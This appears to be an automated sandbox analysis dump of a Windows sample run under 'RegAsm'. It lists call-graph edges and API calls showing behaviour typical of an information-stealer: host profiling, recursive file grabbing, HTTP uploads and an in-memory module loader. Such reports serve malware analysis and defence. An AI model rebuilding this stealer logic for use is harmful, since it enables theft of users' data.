InternetCloseHandle 80498->80500 80501 404220 HttpOpenRequestA 80499->80501 80502 404322 InternetCloseHandle 80499->80502 80507 40429c 80500->80507 80503 404255 80501->80503 80504 40431b InternetCloseHandle 80501->80504 80502->80500 80505 404259 InternetSetOptionA 80503->80505 80506 40426f HttpSendRequestA HttpQueryInfoA 80503->80506 80504->80502 80505->80506 80506->80507 80508 4042bf 80506->80508 80507->78908 80508->80504 80508->80507 80509 4042d9 InternetReadFile 80508->80509 80509->80504 80509->80508 81211 406088 80510->81211 80512 40d4f7 80513 401128 2 API calls 80512->80513 80514 40d508 80513->80514 81435 40afe9 9 API calls 80514->81435 80515 40d2ff StrCmpCA 80520 40d2da 80515->80520 80518 401128 _EH_prolog lstrcpy 80518->80520 80519 401128 2 API calls 80522 40d51b 80519->80522 80520->80512 80520->80515 80520->80518 80521 40d374 StrCmpCA 80520->80521 80524 40e2ea lstrcpy 80520->80524 80526 40d490 StrCmpCA 80520->80526 80527 40e463 _EH_prolog lstrlen lstrcpy lstrcat 80520->80527 80531 40e3ef 3 API calls 80520->80531 80535 40e3a8 lstrcpy 80520->80535 80542 40e321 lstrcpy 80520->80542 81214 40ca5f _EH_prolog 80520->81214 81268 40cd1e _EH_prolog 80520->81268 81381 40a810 _EH_prolog 80520->81381 80521->80520 81462 40b3f4 _EH_prolog 80522->81462 80524->80520 80526->80520 80527->80520 80531->80520 80535->80520 80542->80520 80766 40e2ea lstrcpy 80765->80766 80767 4020ec 80766->80767 80767->79746 80768->79746 80769->79746 80770->79746 80771->79746 80772->79730 80773->79743 80774->79731 80775->79714 80776->79699 80777->79698 80778->79699 80779->79681 80780->79699 80782 40e2ea lstrcpy 80781->80782 80783 402106 80782->80783 80783->79671 80784->79682 80785->79731 80787 40efa4 80786->80787 80788 40e2ea lstrcpy 80787->80788 80789 40efb4 80788->80789 80789->79778 80790->79782 80792 403a20 80791->80792 80792->80792 80793 403a27 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 80792->80793 80802 40e521 80793->80802 80795 403a69 lstrlen 80803 40e521 80795->80803 80797 403a79 InternetCrackUrlA 80798 403a97 80797->80798 80798->79791 80799->79916 80801 40e35c 80800->80801 80801->79841 80802->80795 80803->80797 80804->79925 80805->80106 80806->80108 80807->80110 80808->80112 80809->80116 80810->80118 80812 406219 LocalAlloc 80811->80812 80813 4058d6 80811->80813 80812->80813 80814 406229 CryptStringToBinaryA 80812->80814 80813->79969 80813->79979 80814->80813 80815 406240 LocalFree 80814->80815 80815->80813 80816->80126 80817->80134 80819 40e2ea lstrcpy 80818->80819 80820 40209e 80819->80820 80820->80152 80821->80169 80823 40ef60 CharToOemA 80822->80823 80824 40ef45 RegQueryValueExA 80822->80824 80823->80183 80824->80823 80827 40fac3 80826->80827 80828 40faa7 K32GetModuleFileNameExA CloseHandle 80826->80828 80829 40e2ea lstrcpy 80827->80829 80828->80827 80830 40fad2 80829->80830 80830->80227 80957 40e643 80831->80957 80834 40f162 RegOpenKeyExA 80835 40f182 RegQueryValueExA 80834->80835 80836 40f15b 80834->80836 80835->80836 80836->80249 80838 40f2a3 80837->80838 80839 40f2ab CoSetProxyBlanket 80838->80839 80843 40f3a7 80838->80843 80841 40f2db 80839->80841 80840 40e2ea lstrcpy 80844 40f3bb 80840->80844 80842 40f2e3 80841->80842 80841->80843 80842->80844 80845 40f30f VariantInit 80842->80845 80843->80840 80844->80263 80846 40f331 80845->80846 80963 40f1a8 CoCreateInstance 80846->80963 80848 40f33f FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 80849 40e2ea lstrcpy 80848->80849 80850 40f39b VariantClear 80849->80850 80850->80844 80852 40f42c 80851->80852 80853 40f4cc 80852->80853 80854 40f434 CoSetProxyBlanket 80852->80854 80855 40e2ea lstrcpy 80853->80855 80856 40f464 80854->80856 80857 40f4e0 80855->80857 80856->80853 80858 40f468 80856->80858 80857->80277 80858->80857 80859 40f48c VariantInit 80858->80859 80860 40f4ae 80859->80860 80969 40f70f LocalAlloc CharToOemW 80860->80969 80862 40f4b6 80863 40e2ea lstrcpy 80862->80863 80864 40f4c0 VariantClear 80863->80864 80864->80857 80865->80304 80867 40e2ea lstrcpy 80866->80867 80868 40eef1 80867->80868 80868->80319 80870 40e2ea lstrcpy 80869->80870 80871 40e793 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 80870->80871 80872 40e87e 80871->80872 80878 40e7ce 80871->80878 80873 40e886 LocalFree 80872->80873 80874 40e88f 80872->80874 80873->80874 80874->80333 80875 40e7d3 GetLocaleInfoA 80875->80878 80876 40e463 _EH_prolog lstrlen lstrcpy lstrcat 80876->80878 80877 40e3a8 lstrcpy 80877->80878 80878->80872 80878->80875 80878->80876 80878->80877 80879->80346 80881 40e766 80880->80881 80882 40e74a wsprintfA 80880->80882 80881->80361 80882->80881 80884 40e8e1 RegQueryValueExA 80883->80884 80885 40e8f9 80883->80885 80884->80885 80885->80379 80887 40e98c GetLogicalProcessorInformationEx 80886->80887 80888 40e962 GetLastError 80887->80888 80889 40e997 80887->80889 80890 40e9eb 80888->80890 80891 40e96d 80888->80891 80972 40f560 GetProcessHeap HeapFree 80889->80972 80897 40e9f5 80890->80897 80973 40f560 GetProcessHeap HeapFree 80890->80973 80899 40e971 80891->80899 80894 40e9be 80894->80897 80898 40e9c4 wsprintfA 80894->80898 80897->80393 80898->80897 80899->80887 80900 40e9e4 80899->80900 80970 40f560 GetProcessHeap HeapFree 80899->80970 80971 40f57d GetProcessHeap HeapAlloc 80899->80971 80900->80897 80901->80406 80974 40f529 80902->80974 80905 40ea47 wsprintfA 80905->80420 80908 40e2ea lstrcpy 80907->80908 80913 40ea97 80908->80913 80909 40eb2b EnumDisplayDevicesA 80910 40eb44 80909->80910 80909->80913 80910->80439 80911 40e463 _EH_prolog lstrlen lstrcpy lstrcat 80911->80913 80912 40e3a8 lstrcpy 80912->80913 80913->80909 80913->80910 80913->80911 80913->80912 80915 40e2ea lstrcpy 80914->80915 80916 40edd1 CreateToolhelp32Snapshot Process32First 80915->80916 80917 40ee6a CloseHandle 80916->80917 80921 40ee02 80916->80921 80917->80452 80918 40ee56 Process32Next 80918->80917 80918->80921 80919 40e463 _EH_prolog lstrlen lstrcpy lstrcat 80919->80921 80920 40e3a8 lstrcpy 80920->80921 80921->80918 80921->80919 80921->80920 80923 40e2ea lstrcpy 80922->80923 80924 40eb79 RegOpenKeyExA 80923->80924 80925 40ebac 80924->80925 80937 40ebcb 80924->80937 80927 40e321 lstrcpy 80925->80927 80926 40ebd4 RegEnumKeyExA 80928 40ebfd wsprintfA RegOpenKeyExA 80926->80928 80926->80937 80933 40ebb8 80927->80933 80929 40ed67 80928->80929 80930 40ec41 RegQueryValueExA 80928->80930 80932 40e321 lstrcpy 80929->80932 80931 40ec6b lstrlen 80930->80931 80930->80937 80931->80937 80932->80933 80933->80466 80934 40ecd6 RegQueryValueExA 80934->80937 80935 40e3a8 lstrcpy 80935->80937 80936 40e463 _EH_prolog lstrlen lstrcpy lstrcat 80936->80937 80937->80926 80937->80929 80937->80934 80937->80935 80937->80936 80976 411eac _EH_prolog 80938->80976 80940 412f93 80941 40e3a8 lstrcpy 80940->80941 80942 412fb5 80941->80942 80943 40e3a8 lstrcpy 80942->80943 80944 412fd9 80943->80944 80945 40e3a8 lstrcpy 80944->80945 80946 412fe5 80945->80946 80947 40e3a8 lstrcpy 80946->80947 80948 412ff1 80947->80948 80949 412ff8 Sleep 80948->80949 80950 413008 CreateThread WaitForSingleObject 80948->80950 80949->80948 80951 40e2ea lstrcpy 80950->80951 80980 411d72 _EH_prolog 80950->80980 80952 413036 80951->80952 80978 411ef8 _EH_prolog 80952->80978 80954 413049 80955 4010d8 _EH_prolog 80954->80955 80956 413055 80955->80956 80956->80488 80960 40e5d6 GetProcessHeap HeapAlloc RegOpenKeyExA 80957->80960 80959 40e648 80959->80834 80959->80836 80961 40e619 RegQueryValueExA 80960->80961 80962 40e630 80960->80962 80961->80962 80962->80959 80964 40f1d2 SysAllocString 80963->80964 80965 40f233 80963->80965 80964->80965 80967 40f1e2 80964->80967 80965->80848 80966 40f22f SysFreeString 80966->80965 80967->80966 80968 40f215 _wtoi64 SysFreeString 80967->80968 80968->80966 80969->80862 80970->80899 80971->80899 80972->80894 80973->80897 80975 40ea31 GlobalMemoryStatusEx 80974->80975 80975->80905 80977 411ec5 80976->80977 80977->80940 80979 411f18 80978->80979 80979->80954 80989 40e521 80980->80989 80982 411d93 lstrlen 80986 411daa 80982->80986 80988 411d9f 80982->80988 80983 40e321 lstrcpy 80983->80986 80985 40e3a8 lstrcpy 80985->80986 80986->80983 80986->80985 80987 411e52 StrCmpCA 80986->80987 80990 404360 _EH_prolog 80986->80990 80987->80986 80987->80988 80989->80982 80991 40e321 lstrcpy 80990->80991 80992 404390 80991->80992 80993 403a07 6 API calls 80992->80993 80994 40439c 80993->80994 81197 40f82e 80994->81197 80996 4043c8 80997 4043d3 lstrlen 80996->80997 80998 4043e3 80997->80998 80999 40f82e 4 API calls 80998->80999 81000 4043f1 80999->81000 81001 40e2ea lstrcpy 81000->81001 81002 404401 81001->81002 81003 40e2ea lstrcpy 81002->81003 81004 404412 81003->81004 81005 40e2ea lstrcpy 81004->81005 81006 404423 81005->81006 81007 40e2ea lstrcpy 81006->81007 81008 404434 81007->81008 81009 40e2ea lstrcpy 81008->81009 81010 404445 StrCmpCA 81009->81010 81013 404461 81010->81013 81011 404487 81012 40f5de 3 API calls 81011->81012 81015 404492 81012->81015 81013->81011 81014 404476 InternetOpenA 81013->81014 81014->81011 81025 404cba 81014->81025 81016 40e3ef 3 API calls 81015->81016 81017 4044a8 81016->81017 81018 40e3a8 lstrcpy 81017->81018 81019 4044b5 81018->81019 81020 40e463 4 API calls 81019->81020 81021 4044e1 81020->81021 81022 40e3ef 3 API calls 81021->81022 81023 4044f7 81022->81023 81024 40e463 4 API calls 81023->81024 81026 40450b 81024->81026 81027 40e321 lstrcpy 81025->81027 81028 40e3a8 lstrcpy 81026->81028 81038 404c16 81027->81038 81029 404518 81028->81029 81030 40e463 4 API calls 81029->81030 81031 404551 81030->81031 81032 40e3ef 3 API calls 81031->81032 81033 404564 81032->81033 81034 40e3a8 lstrcpy 81033->81034 81035 404571 81034->81035 81038->80986 81198 40f83f CryptBinaryToStringA 81197->81198 81201 40f83b 81197->81201 81199 40f85c GetProcessHeap HeapAlloc 81198->81199 81198->81201 81200 40f879 CryptBinaryToStringA 81199->81200 81199->81201 81200->81201 81201->80996 81210->80497 81539 406051 81211->81539 81213 406097 81213->80520 81215 40e2ea lstrcpy 81214->81215 81216 40ca83 81215->81216 81592 40f7a3 SHGetFolderPathA 81216->81592 81219 40e3ef 3 API calls 81220 40caad 81219->81220 81221 40e3a8 lstrcpy 81220->81221 81222 40caba 81221->81222 81223 40e3ef 3 API calls 81222->81223 81269 40e2ea lstrcpy 81268->81269 81270 40cd42 81269->81270 81271 40e2ea lstrcpy 81270->81271 81272 40cd53 81271->81272 81273 40cd6c StrCmpCA 81272->81273 81274 40cffa 81273->81274 81275 40cd7d 81273->81275 81276 40f7a3 2 API calls 81274->81276 81277 40f7a3 2 API calls 81275->81277 81278 40d003 81276->81278 81279 40cd86 81277->81279 81280 40e3ef 3 API calls 81278->81280 81281 40e3ef 3 API calls 81279->81281 81282 40d016 81280->81282 81283 40cd99 81281->81283 81382 40e2ea lstrcpy 81381->81382 81383 40a831 81382->81383 81384 40e2ea lstrcpy 81383->81384 81385 40a842 81384->81385 81386 40f7a3 2 API calls 81385->81386 81387 40a851 81386->81387 81388 40e3ef 3 API calls 81387->81388 81389 40a864 81388->81389 81390 40e3a8 lstrcpy 81389->81390 81436 40b3d9 81435->81436 81437 40b0bf RegGetValueA 81435->81437 81438 4010d8 _EH_prolog 81436->81438 81442 40b0e3 RegOpenKeyExA 81437->81442 81439 40b3e5 81438->81439 81439->80519 81441 40b136 RegEnumKeyExA 81443 40b157 GetProcessHeap HeapAlloc 81441->81443 81444 40b3c8 81441->81444 81442->81436 81442->81441 81445 40b16d lstrcat lstrcat RegGetValueA lstrcat RegGetValueA 81443->81445 81444->81436 81446 40b212 lstrcat 81445->81446 81455 40b1e2 81445->81455 81447 40b220 8 API calls 81446->81447 81447->81455 81455->81447 81457 40b2e8 lstrcat 81455->81457 81457->81455 81463 40e2ea lstrcpy 81462->81463 81540 40605c 81539->81540 81543 405f4d 81540->81543 81542 40606d 81542->81213 81546 405de6 81543->81546 81547 405df7 81546->81547 81548 405dff 81546->81548 81547->81542 81562 40597d 81548->81562 81552 405e32 81552->81547 81574 405c0b 81552->81574 81556 405eac 81556->81547 81588 40f560 GetProcessHeap HeapFree 81556->81588 81558 405eed FreeLibrary 81558->81558 81559 405eff 81558->81559 81587 40f560 GetProcessHeap HeapFree 81559->81587 81564 40598c 81562->81564 81563 405993 81563->81547 81568 405a30 81563->81568 81564->81563 81565 4059e3 81564->81565 81589 40f57d GetProcessHeap HeapAlloc 81565->81589 81567 4059f2 81567->81563 81569 405a78 VirtualAlloc 81568->81569 81570 405a4f 81568->81570 81571 405aa8 81569->81571 81572 405aae 81569->81572 81570->81569 81571->81572 81573 405ab3 VirtualAlloc 81571->81573 81572->81552 81573->81572 81575 405d33 81574->81575 81576 405c25 81574->81576 81575->81547 81583 405d46 81575->81583 81576->81575 81577 405c3f LoadLibraryA 81576->81577 81578 405d39 81577->81578 81582 405c59 81577->81582 81578->81575 81580 405d05 GetProcAddress 81580->81578 81580->81582 81582->81576 81582->81578 81582->81580 81590 40f57d GetProcessHeap HeapAlloc 81582->81590 81591 40f560 GetProcessHeap HeapFree 81582->81591 81584 405ddb 81583->81584 81585 405d5c 81583->81585 81584->81547 81584->81556 81584->81558 81584->81559 81585->81584 81586 405db1 VirtualProtect 81585->81586 81586->81584 81586->81585 81587->81556 81588->81547 81589->81567 81590->81582 81591->81582 81593 40e2ea lstrcpy 81592->81593 81594 40ca9a 81593->81594 81594->81219

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,004153D3), ref: 004160A3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004160BA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004160D1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004160E8
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004160FF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416116
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041612D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416144
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041615B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416172
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416189
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004161A0
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004161B7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004161CE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004161E5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004161FC
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416213
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041622A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416241
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416258
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041626F
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416286
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041629D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004162B4
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004162CB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004162E2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004162F9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416310
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416327
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041633E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416355
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041636C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416383
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041639A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004163B1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004163C8
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004163DF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004163F6
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041640D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416424
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041643B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416452
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416469
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(004153D3,?,00000040,00000064,004120B6,0041174F,?,0000002C,00000064,00412035,00412072,?,00000024,00000064,Function_00011FF8,00411CE1), ref: 0041647A
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 0041648B
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 0041649C
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 004164AD
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 004164BE
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 004164CF
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 004164E0
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 004164F1
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00416501
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000), ref: 0041651C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416533
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041654A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416561
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416578
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734C0000), ref: 00416597
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004165AE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004165C5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004165DC
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004165F3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041660A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416621
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416638
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000), ref: 00416653
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041666A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416681
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416698
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004166AF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000), ref: 004166CE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004166E5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004166FC
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416713
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041672A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416741
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000), ref: 00416760
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416777
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041678E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004167A5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004167BC
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004167D3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004167EA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416801
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416818
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000), ref: 00416833
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041684A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416861
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416878
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041688F
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75450000), ref: 004168AA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004168C1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75DA0000), ref: 004168DC
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004168F3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F2D0000), ref: 00416912
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416929
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416940
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416957
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041696E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416985
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0041699C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 004169B3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004169C9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004169DF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000), ref: 004169FA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416A11
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416A28
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416A3F
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75D90000), ref: 00416A5A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6E340000), ref: 00416A75
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416A8C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416AA3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00416ABA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CB30000,SymMatchString), ref: 00416AD4
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                              • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                                                                              • API String ID: 2238633743-951535364
                                                                                                                                                                                                                                                              • Opcode ID: 374768779ad9c1c57e1c16cf8ad7dc588652fe9c528a838a6daf341ebb71f208
                                                                                                                                                                                                                                                              • Instruction ID: 3e6caa5aab8599317485c50970fdae4c6edc1eb62b0e69e57b0e8c70e6e37883
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 374768779ad9c1c57e1c16cf8ad7dc588652fe9c528a838a6daf341ebb71f208
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E142E875411600EFDB1A9FA0FE48A293FB7FB08B21B14742AF905D2270D7364866EF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1460 413f80-413ff3 _EH_prolog call 416c10 wsprintfA FindFirstFileA memset * 2 1463 414322-41433c call 4010d8 1460->1463 1464 413ff9-41400d StrCmpCA 1460->1464 1466 414301-414313 FindNextFileA 1464->1466 1467 414013-414027 StrCmpCA 1464->1467 1466->1464 1469 414319-41431c FindClose 1466->1469 1467->1466 1468 41402d-414069 wsprintfA StrCmpCA 1467->1468 1471 414085-414094 wsprintfA 1468->1471 1472 41406b-414083 wsprintfA 1468->1472 1469->1463 1473 414097-4140c8 memset lstrcat 1471->1473 1472->1473 1474 4140eb-4140f5 strtok_s 1473->1474 1475 4140f7-41412b memset lstrcat 1474->1475 1476 4140ca-4140db 1474->1476 1477 4141ee-4141f8 strtok_s 1475->1477 1481 4140e1-4140ea 1476->1481 1482 41428c-414292 1476->1482 1479 414130-414140 PathMatchSpecA 1477->1479 1480 4141fe 1477->1480 1483 4141e4-4141ed 1479->1483 1484 414146-4141d3 call 40f5de wsprintfA call 40e355 call 40f994 call 416db0 1479->1484 1480->1482 1481->1474 1482->1466 1486 414294-4142a0 1482->1486 1483->1477 1502 414203-414212 1484->1502 1503 4141d5-4141e2 1484->1503 1486->1469 1488 4142a2-4142aa 1486->1488 1488->1466 1489 4142ac-4142f6 call 401128 call 413f80 1488->1489 1496 4142fb 1489->1496 1496->1466 1502->1463 1504 414218-41423e call 40e2ea call 406138 1502->1504 1503->1483 1510 414240-414285 call 40e2ea call 401128 call 412f70 call 40e355 1504->1510 1511 41428a 1504->1511 1510->1511 1511->1482
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00413F85
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00413FAB
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00413FC2
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413FD9
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413FE7
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00424758), ref: 00414005
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0042475C), ref: 0041401F
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414043
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0042446F), ref: 00414054
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0041407A
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0041408E
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004140A0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004140B2
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 004140EB
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00414100
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00414115
                                                                                                                                                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414138
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0041417A
